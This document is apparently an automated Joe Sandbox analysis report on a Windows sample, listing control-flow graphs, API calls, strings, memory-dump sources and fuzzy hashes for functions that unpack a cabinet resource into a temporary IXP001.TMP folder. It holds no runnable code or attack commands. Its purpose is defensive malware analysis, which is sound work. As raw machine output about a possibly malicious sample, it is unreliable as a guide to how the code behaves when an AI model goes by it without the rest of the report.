                                                                                                                                                                                                                                                            control_flow_graph 324 622caa-622d1c memset * 3 call 62468f 327 622d22-622d27 324->327 328 622ef3 324->328 327->328 329 622d2d-622d59 CreateEventA SetEvent call 62468f 327->329 330 622ef8-622f01 call 6244b9 328->330 335 622d5b-622d78 call 6244b9 329->335 336 622d7d-622d84 329->336 334 622f06 330->334 337 622f08-622f18 call 626ce0 334->337 335->334 339 622d8a-622da1 call 62468f 336->339 340 622e1f-622e2e call 625c9e 336->340 339->335 350 622da3-622dbb CreateMutexA 339->350 348 622e30-622e35 340->348 349 622e3a-622e41 340->349 348->330 352 622e52-622e62 FindResourceA 349->352 353 622e43-622e4d call 622390 349->353 350->340 351 622dbd-622dc8 GetLastError 350->351 351->340 354 622dca-622dd3 351->354 355 622e64-622e6c LoadResource 352->355 356 622e6e-622e75 352->356 353->334 359 622dd5-622de8 call 6244b9 354->359 360 622dea-622e02 call 6244b9 354->360 355->356 361 622e77 356->361 362 622e7d-622e84 356->362 370 622e04-622e1a CloseHandle 359->370 360->340 360->370 361->362 365 622e86-622e89 362->365 366 622e8b-622e94 call 6236ee 362->366 365->337 366->334 372 622e96-622ea2 366->372 370->334 373 622eb0-622eba 372->373 374 622ea4-622ea8 372->374 376 622eef-622ef1 373->376 377 622ebc-622ec3 373->377 374->373 375 622eaa-622eae 374->375 375->373 375->376 376->337 377->376 378 622ec5-622ecc call 6218a3 377->378 378->376 381 622ece-622eed call 626517 378->381 381->334 381->376
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00622CD9
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00622CE9
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00622CF9
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246A0
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: SizeofResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246A9
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246C3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LoadResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246CC
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LockResource.KERNEL32(00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246D3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: memcpy_s.MSVCRT ref: 006246E5
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 006246EF
                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00622D34
                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00622D40
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00622DAE
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00622DBD
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(valid,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00622E0A
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00624518
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00624554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$valid
                                                                                                                                                                                                                                                            • API String ID: 1002816675-2613340241
                                                                                                                                                                                                                                                            • Opcode ID: 1fac2542f36cad7a0e79fd8290a98b426b2cceb1f17dec3563ebcffbb3b6e933
                                                                                                                                                                                                                                                            • Instruction ID: ba04d9126e48d5bdf522d67fffb8963cf90da566c1f53b4cd22fc02ea95dd3b5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fac2542f36cad7a0e79fd8290a98b426b2cceb1f17dec3563ebcffbb3b6e933
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA511A70641F327BE7706B70BD1ABBB259BDB81700F014029F985D62D5DEB48D829E26
                                                                                                                                                                                                                                                            Function 00624FE0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 384 624fe0-62501a call 62468f FindResourceA LoadResource LockResource 387 625020-625027 384->387 388 625161-625163 384->388 389 625057-62505e call 624efd 387->389 390 625029-625051 GetDlgItem ShowWindow GetDlgItem ShowWindow 387->390 393 625060-625077 call 6244b9 389->393 394 62507c-6250b4 389->394 390->389 400 625107-62510e 393->400 398 6250b6-6250da 394->398 399 6250e8-625104 call 6244b9 394->399 411 625106 398->411 412 6250dc 398->412 399->411 402 625110-625117 FreeResource 400->402 403 62511d-62511f 400->403 402->403 406 625121-625127 403->406 407 62513a-625141 403->407 406->407 408 625129-625135 call 6244b9 406->408 409 625143-62514a 407->409 410 62515f 407->410 408->407 409->410 414 62514c-625159 SendMessageA 409->414 410->388 411->400 415 6250e3-6250e6 412->415 414->410 415->399 415->411
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246A0
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: SizeofResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246A9
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246C3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LoadResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246CC
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LockResource.KERNEL32(00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246D3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: memcpy_s.MSVCRT ref: 006246E5
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 006246EF
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00624FFE
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00625006
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 0062500D
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 00625030
                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00625037
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 0062504A
                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00625051
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00625111
                                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00625159
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET$J,Q
                                                                                                                                                                                                                                                            • API String ID: 1305606123-2397291215
                                                                                                                                                                                                                                                            • Opcode ID: 64008b07fc0fcbd97067845825a5988943e022744d5bdf1db3c871495c6bc51b
                                                                                                                                                                                                                                                            • Instruction ID: d4d8233c9f002b134b16b77e064052892e6bb0c7a4823d65281dedcb620b4d6f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64008b07fc0fcbd97067845825a5988943e022744d5bdf1db3c871495c6bc51b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8731F570641F227FE7305BA1BC8EFA7369FA744799F052014B902A2291CEB48C628E64
                                                                                                                                                                                                                                                            Function 0062597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 416 62597d-6259b9 GetCurrentDirectoryA SetCurrentDirectoryA 417 6259bb-6259d8 call 6244b9 call 626285 416->417 418 6259dd-625a1b GetDiskFreeSpaceA 416->418 433 625c05-625c14 call 626ce0 417->433 420 625ba1-625bde memset call 626285 GetLastError FormatMessageA 418->420 421 625a21-625a4a MulDiv 418->421 430 625be3-625bfc call 6244b9 SetCurrentDirectoryA 420->430 421->420 424 625a50-625a6c GetVolumeInformationA 421->424 427 625ab5-625aca SetCurrentDirectoryA 424->427 428 625a6e-625ab0 memset call 626285 GetLastError FormatMessageA 424->428 432 625acc-625ad1 427->432 428->430 445 625c02 430->445 436 625ae2-625ae4 432->436 437 625ad3-625ad8 432->437 440 625ae6 436->440 441 625ae7-625af8 436->441 437->436 438 625ada-625ae0 437->438 438->432 438->436 440->441 444 625af9-625afb 441->444 446 625b05-625b08 444->446 447 625afd-625b03 444->447 448 625c04 445->448 449 625b20-625b27 446->449 450 625b0a-625b1b call 6244b9 446->450 447->444 447->446 448->433 452 625b52-625b5b 449->452 453 625b29-625b33 449->453 450->445 456 625b62-625b6d 452->456 453->452 455 625b35-625b50 453->455 455->456 457 625b76-625b7d 456->457 458 625b6f-625b74 456->458 460 625b83 457->460 461 625b7f-625b81 457->461 459 625b85 458->459 462 625b96-625b9f 459->462 463 625b87-625b94 call 62268b 459->463 460->459 461->459 462->448 463->448
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 006259A8
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 006259AF
                                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00625A13
                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00625A40
                                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00625A64
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00625A7C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00625A98
                                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00625AA5
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00625BFC
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00624518
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00624554
                                                                                                                                                                                                                                                              • Part of subcall function 00626285: GetLastError.KERNEL32(00625BBC), ref: 00626285
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                                            • Opcode ID: 237facd103a2ee1be383feee14415d5b81bd2f5341aa04d93d6b9d55bb4578cb
                                                                                                                                                                                                                                                            • Instruction ID: 684c7795a048eddfc936236b53ed238cff5d97b625f1f12c98e08ab9b32428a1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 237facd103a2ee1be383feee14415d5b81bd2f5341aa04d93d6b9d55bb4578cb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 387195B1900A2CAFD735DF64DC95FFA77AEEB48344F0440A9F406D6240DA709E868F25
                                                                                                                                                                                                                                                            Function 006253A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0062171E: _vsnprintf.MSVCRT ref: 00621750
                                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 006253FB
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?), ref: 00625402
                                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?), ref: 0062541F
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0062542B
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00625434
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00625452
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                            • API String ID: 1082909758-957705000
                                                                                                                                                                                                                                                            • Opcode ID: af84bab908374ddb2648f97b4db4badb313c1150a20072fd2de5e9d43faf4823
                                                                                                                                                                                                                                                            • Instruction ID: bacace5cb9b390055e51f1849d24b278c509dc442e16758df4df2ceda1dc5c89
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af84bab908374ddb2648f97b4db4badb313c1150a20072fd2de5e9d43faf4823
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D110871304D2467D330AB66AC49FEF765FDBD2325F101129B547D6290CEB489838AA5
                                                                                                                                                                                                                                                            Function 0062468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 538 62468f-6246b4 FindResourceA SizeofResource 539 6246b6-6246b8 538->539 540 6246fb-6246ff 538->540 539->540 541 6246ba-6246bc 539->541 542 6246f9 541->542 543 6246be-6246dd FindResourceA LoadResource LockResource 541->543 542->540 543->542 544 6246df-6246f7 memcpy_s FreeResource 543->544 544->540
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246A0
                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246A9
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246C3
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246CC
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246D3
                                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 006246E5
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 006246EF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                            • String ID: TITLE$valid
                                                                                                                                                                                                                                                            • API String ID: 3370778649-1357392868
                                                                                                                                                                                                                                                            • Opcode ID: cdac01b184e32d847ad851933241ff41d3b64b506c607d9c787ebc9056e19840
                                                                                                                                                                                                                                                            • Instruction ID: f35e0eee661b5eb8c23a3d0015b6b2e72508fa88a02361ff7cb59e216fc884c7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdac01b184e32d847ad851933241ff41d3b64b506c607d9c787ebc9056e19840
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F01A936245A217BE3301BE56C4DF6B7E2EDBC6F61F050014FE4A97290CDF1885286B6
                                                                                                                                                                                                                                                            Function 00625467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 545 625467-625484 546 62548a-625490 call 6253a1 545->546 547 62551c-625528 call 621680 545->547 550 625495-625497 546->550 551 62552d-625539 call 6258c8 547->551 553 625581-625583 550->553 554 62549d-6254c0 call 621781 550->554 559 62553b-625545 CreateDirectoryA 551->559 560 62554d-625552 551->560 556 62558d-62559d call 626ce0 553->556 562 6254c2-6254d8 GetSystemInfo 554->562 563 62550c-62551a call 62658a 554->563 565 625577-62557c call 626285 559->565 566 625547 559->566 567 625554-625557 call 62597d 560->567 568 625585-62558b 560->568 569 6254da-6254dd 562->569 570 6254fe 562->570 563->551 565->553 566->560 576 62555c-62555e 567->576 568->556 574 6254f7-6254fc 569->574 575 6254df-6254e2 569->575 577 625503-625507 call 62658a 570->577 574->577 580 6254f0-6254f5 575->580 581 6254e4-6254e7 575->581 576->568 582 625560-625566 576->582 577->563 580->577 581->563 584 6254e9-6254ee 581->584 582->553 585 625568-625575 RemoveDirectoryA 582->585 584->577 585->553
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 006254C9
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0062553D
                                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0062556F
                                                                                                                                                                                                                                                              • Part of subcall function 006253A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 006253FB
                                                                                                                                                                                                                                                              • Part of subcall function 006253A1: GetFileAttributesA.KERNELBASE(?), ref: 00625402
                                                                                                                                                                                                                                                              • Part of subcall function 006253A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?), ref: 0062541F
                                                                                                                                                                                                                                                              • Part of subcall function 006253A1: DeleteFileA.KERNEL32(?), ref: 0062542B
                                                                                                                                                                                                                                                              • Part of subcall function 006253A1: CreateDirectoryA.KERNEL32(?,00000000), ref: 00625434
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                            • API String ID: 1979080616-772166365
                                                                                                                                                                                                                                                            • Opcode ID: 85e2c5332ff95ef68be87e7687b818dea3335de94d531c2b8a26b70f0ce739f5
                                                                                                                                                                                                                                                            • Instruction ID: 02c581a18563923c69dd98e2bdd933673ff6a3a7871047cc21f27c03f7569523
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85e2c5332ff95ef68be87e7687b818dea3335de94d531c2b8a26b70f0ce739f5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1312C70B14E305BCB30AF25BC495BE779BAB96384B04412AB807E7654DF70CE428E95
                                                                                                                                                                                                                                                            Function 0062256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 586 62256d-62257d 587 622622-622627 call 6224e0 586->587 588 622583-622589 586->588 594 622629-62262f 587->594 590 62258b 588->590 591 6225e8-622607 RegOpenKeyExA 588->591 593 622591-622595 590->593 590->594 595 6225e3-6225e6 591->595 596 622609-622620 RegQueryInfoKeyA 591->596 593->594 597 62259b-6225ba RegOpenKeyExA 593->597 595->594 598 6225d1-6225dd RegCloseKey 596->598 597->595 599 6225bc-6225cb RegQueryValueExA 597->599 598->595 599->598
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,?,?,?,00621ED3,00000001,00000000,?,?,00624137,?), ref: 006225B2
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,?,?,00621ED3,00000001,00000000,?,?,00624137,?,00624096), ref: 006225CB
                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00621ED3,00000001,00000000,?,?,00624137,?,00624096), ref: 006225DD
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,?,?,?,00621ED3,00000001,00000000,?,?,00624137,?), ref: 006225FF
                                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00621ED3,00000001,00000000), ref: 0062261A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 006225C3
                                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 006225F5
                                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 006225A8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
